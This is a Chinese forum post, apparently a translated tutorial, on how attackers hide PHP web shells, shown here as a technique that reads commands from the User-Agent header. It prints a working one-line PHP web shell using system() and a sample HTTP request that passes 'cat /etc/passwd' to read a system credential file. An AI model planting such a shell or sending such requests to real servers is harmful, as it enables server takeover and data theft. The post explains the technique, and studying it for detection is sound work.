请选择 进入手机版 | 继续访问电脑版

默认
回复 0

140

主题

145

帖子

442

积分

中级会员

Rank: 3Rank: 3

积分
442
QQ
Web Shell Part 3-1 隐藏 Web Shell[复制链接]
发表于 2018-6-14 10:51:36 | 显示全部楼层 |阅读模式
本帖最后由 Grey 于 2018-6-15 04:13 编辑

在本系列的第2部分中,我们看了PHP编程语言中的web-shells的具体示例。在本系列的第3部分中,我们将介绍攻击者用来隐藏网页外壳的一些技术。



可以使用各种方法将命令发送到web-shell,HTTP POST请求是最常见的。但是,黑客并不完全是按照规则玩的人。以下是一些攻击者可以用来保持Web壳体处于雷达状态的技巧。

修改标题
它们不是通过$ _POST请求参数传递命令,而是使用用户代理字符串。

<?php system($_SERVER['HTTP_USER_AGENT'])?>

然后,攻击者可以通过将该命令放入'User-Agent'HTTP头部中来制作特定的HTTP请求。

GET /demo/shell.php HTTP/1.1
Host: 192.168.5.25
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: cat /etc/passwd
Accept-Encoding: gzip, deflate, sdch
Accept-Language: en-GB,en-US;q=0.8,en;q=0.6,el;q=0.4


这种行为的影响可以在服务器日志中看到,其中第二个请求的HTTP'User-Agent'被cat /etc/passwd命令取代。
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则


QQArchiver 手机版 小黑屋  

免责声明:网站所有帖子,内容均为网友提供,不代表本社区立场! , Processed in 0.171695 second(s), 27 queries .

Powered by Discuz! X3.2

Copyright © 2015 ~ 2018 maishell交易网 保留所有权利!

返回顶部